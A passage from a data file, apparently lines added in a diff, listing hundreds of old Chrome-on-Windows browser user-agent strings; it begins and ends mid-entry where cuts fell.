U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.0 Safari/530.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.177.1 Safari/530.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.8 (KHTML, like Gecko) Chrome/2.0.178.0 Safari/530.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/3.0.191.3 Safari/531.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.24 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML,like Gecko) Chrome/3.0.195.27 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.201.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.0 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.4 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.0 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.7 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.4 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.288.1 Safari/532.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.2 Safari/533.2 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.356.0 Safari/533.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.357.0 Safari/533.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.8 (KHTML, like Gecko) Chrome/6.0.397.0 Safari/533.8 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.548.0 Safari/534.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 +Mozilla/5.0 (Windows U Windows NT 5.1 en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.583.0 Safari/534.12 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.599.0 Safari/534.13 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.602.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.19 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.19 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.682.0 Safari/534.21 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.724.100 Safari/534.30 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.53 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.9 (KHTML, like Gecko) Chrome/7.0.531.0 Safari/534.9 +Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16 +Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.463.0 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4 +Mozilla/5.0 (Windows; U; Windows NT 5.2; eu) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; de) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.31 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.42 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.46 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.160.0 Safari/530.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.164.0 Safari/530.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.168.0 Safari/530.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.171.0 Safari/530.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.23 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.0 Safari/531.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.220.1 Safari/532.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.0 Safari/532.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.224.2 Safari/532.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.241.0 Safari/532.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.8 (KHTML, like Gecko) Chrome/7.0.521.0 Safari/534.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1 +Mozilla/5.0 